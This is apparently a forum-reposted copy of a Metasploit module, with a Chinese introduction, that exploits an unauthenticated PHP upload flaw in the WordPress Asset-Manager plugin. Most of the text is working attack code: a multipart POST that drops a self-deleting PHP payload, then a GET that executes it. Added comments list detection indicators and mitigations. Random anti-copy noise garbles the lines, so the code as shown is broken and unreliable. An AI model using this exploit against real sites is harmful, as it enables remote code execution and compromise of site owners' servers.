这个模块利用的是 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞(已收录于 Metasploit 漏洞库)。该插件允许上传 PHP 文件:用户无需身份验证即可将文件上传到一个临时目录,从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'0 M' ^6 o3 X8 N6 I6 |& J
require 'msf/core/exploit/php_exe'1 G# F5 v, b% |3 y
class Metasploit3 < Msf::Exploit::Remote
# NOTE(review): this listing was pasted through a forum that interleaves
# anti-copy noise (e.g. "6 D, C, n3 m& Q+ w") into the whitespace. Those tokens
# are not part of the module and the text as shown does not parse as Ruby
# (see the mangled mixin name two lines below the Rank). Treat it as a
# damaged copy of a 2012 Metasploit module, useful for understanding the
# vulnerability class and the HTTP artefacts a defender should look for.
; v$ f8 x( ]" _* ?7 [* d( T) f' b Rank = ExcellentRanking4 m& v# O9 t% A* Y
U y2 @5 h4 i
include Msf::Exploit::Remote::HttpClient
0 s% o( l. ]7 M+ E( ~ include Msf::Exploit: hpEXE1 b" h6 ^( J# E! }/ P
7 i2 @1 j- y/ ^: ?2 O3 {- f
# Module metadata only: name, description (Asset-Manager <= 2.0, unauthenticated
# upload via upload.php), author credits, public references (OSVDB 82653,
# BID 53809, EDB 18993), PHP payload targets and the single TARGETURI option
# (default '/wordpress'). Nothing here touches the network.
def initialize(info = {})4 X& ^- v! m, m8 I9 X8 d
super(update_info(info,' }5 @% z7 G k) s
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',; l7 a1 ^* [" b2 G: g
'Description' => %q{1 L4 ^0 c* D# t% j4 N' j! h! p
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress8 l% }* _4 w8 m, |1 R7 @# ^: Y
plugin. By abusing the upload.php file, a malicious user can upload a file to a' f9 o' W4 I2 `$ q% t3 ^
temp directory without authentication, which results in arbitrary code execution.
5 a5 q( o8 n7 W1 ^- @ R. c },6 L% j3 J- a7 ]! t/ X8 Q r. x o
'Author' =>4 }# x+ G2 t# h0 {; U2 s( v9 @
[
0 L! t5 H; D; Y! d2 D 'Sammy FORGIT', # initial discovery+ b8 j, d7 r' `( [5 a
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
# ?$ h8 k$ s5 ?- a* z( ] ],
6 D" {5 M. ~8 B! N1 ] s. e 'License' => MSF_LICENSE,
; j6 D$ M! A# I5 T0 a% C4 g 'References' =>- r; C+ d* c/ Y6 j& F6 f
[: u* H/ V+ D5 ?3 F
[ 'OSVDB', '82653' ],
B% p4 g4 I" |, U [ 'BID', '53809' ],
3 ^$ X* w; v: g2 n [ 'EDB', '18993' ],
4 d, R" ~; d) w4 R8 U [ 'URL', 'http:// www.myhack58.com /' ]' d. U/ K) W2 }
],+ U1 ^- H! Y3 k+ b1 ]/ d9 k, z
'Payload' =>
) u/ j1 B/ E. P" x* T/ X3 D9 X {9 U+ b( u$ f. b& ]: v
'BadChars' => "\x00",6 {' R, \# e: M0 J6 p$ Y N3 Q
},4 [1 p8 a& [& x3 O
'Platform' => 'php',
4 O3 V$ O% w7 }7 V8 |! S: h 'Arch' => ARCH_PHP,( ]/ U/ z0 t8 ]9 ?
'Targets' =>' N$ _7 z9 b4 b% K
[
4 x: I% W: X* @5 m8 L [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],( V- h8 g$ S% q" B1 V
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
3 Z! `2 p- V4 n ],
# |' ?. G, i5 Y* j 'DefaultTarget' => 0,
* `5 r1 d6 |9 c# S 'DisclosureDate' => 'May 26 2012'))
$ N- v& N& T( V7 A/ H
. }0 X- n' d2 ~/ Y% g: P, z4 s' g! ?( h register_options(& P( ]/ A+ L: n* [: x* C
[
. N# I U( e5 O3 b2 H OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
) h3 O1 a! C) H2 g ], self.class)! X& g/ H# t: S) A$ ]" b/ S( L
end0 k2 q7 a0 ^6 F; ^8 _
# Two HTTP requests, both visible in ordinary web-server access logs:
#   1. POST  <TARGETURI>/wp-content/plugins/asset-manager/upload.php
#      (multipart/form-data, field "Filedata", a randomly named .php file)
#   2. GET   <TARGETURI>/wp-content/uploads/assets/temp/<random>.php
# Detection: an unauthenticated POST to the plugin's upload.php followed by a
# GET of a .php file under wp-content/uploads/assets/temp/ is the indicator.
# Mitigation: the description scopes this to Asset-Manager <= 2.0; removing or
# upgrading the plugin, and denying PHP execution under wp-content/uploads
# (a common WordPress hardening step), both break this chain.
$ ^" K. e# k* G* P9 A1 b def exploit8 C5 M3 _* c' G8 ^' {
uri = target_uri.path$ U( \' O# T& m3 y: }
# Normalise TARGETURI so the plugin paths below can be appended directly.
uri << '/' if uri[-1,1] != '/'1 E* p& p7 z+ x1 s7 F3 z& w+ d/ H+ {8 ]
peer = "#{rhost}:#{rport}"3 M' k+ D0 [) G0 E
# Five random alpha characters plus ".php": there is no fixed filename to
# signature on; match on the path prefix instead.
payload_name = "#{rand_text_alpha(5)}.php"2 d6 y4 G. e7 Q6 M$ m( P: ^+ K5 @( e3 z
# :unlink_self presumably makes the dropped file delete itself once run, so
# the artefact may be gone by the time of forensic review — the access-log
# pair above is the durable evidence. (behaviour of the helper not shown here)
php_payload = get_write_exec_payload(:unlink_self=>true)7 B4 X8 q, j) E' e$ k" B
) h: W8 A$ h# a& X" _2 r( w6 N data = Rex::MIME::Message.new3 D( @! B) X' k/ t* B k
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
# Strips a leading CRLF before the first multipart boundary — looks like a
# quirk of Rex::MIME::Message#to_s at the time; verify before relying on it.
! d' u' k! m* o. D! \+ X- ^ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
8 V: w4 `4 ~& M& t5 x
6 U$ D$ i' w+ P* n" Z* r print_status("#{peer} - Uploading payload #{payload_name}")6 u& J$ T& T5 X0 x7 V
res = send_request_cgi({
" F. A5 @2 U! Z' s# U' O3 J 'method' => 'POST',3 N. C! [$ q+ G. \* C1 C& T
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",: f8 A0 {3 Y/ J$ z& @
'ctype' => "multipart/form-data; boundary=#{data.bound}",
Q4 V/ @% T3 O3 `2 s( o* Y. v 'data' => post_data
1 a4 W1 h4 L. x- V' T- C })
; d- f) a9 ?9 O3 l' m
# Success criterion for the upload: HTTP 200 and the response body echoes the
# uploaded filename. A missing response, non-200, or a body without the name
# all abort here.
( |0 G- K' \: S, Y& r) V7 b+ S if not res or res.code != 200 or res.body !~ /#{payload_name}/
! i4 q7 v! F! W5 p- P fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")8 i- o3 I; \/ r+ p. v
end
0 ]: F. g3 U" O0 o% A 6 c: F3 e0 e6 F1 _
print_status("#{peer} - Executing payload #{payload_name}"); U8 H' x# J) w, o: {
res = send_request_raw({
8 Y- h/ D1 y2 q: Q( o8 ] 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: t% p& c: h6 p4 T! y8 `, N2 u
'method' => 'GET'
: c' t; `) j4 H) L })
: c' d8 ]9 k2 F+ `. S" E' r1 i : M7 \# o7 ^! }/ X/ i
# Unlike the upload check, a nil response is NOT treated as failure here:
# only a response with a non-200 status raises. The condition is "res and
# res.code != 200", so no reply at all falls through silently.
if res and res.code != 200
1 s+ x$ e" v2 |& u fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
3 O) B, C$ i& x' c end. k4 @8 v. L5 J1 s3 O
end
\. _9 W% G' a( i3 p4 F5 _: ^end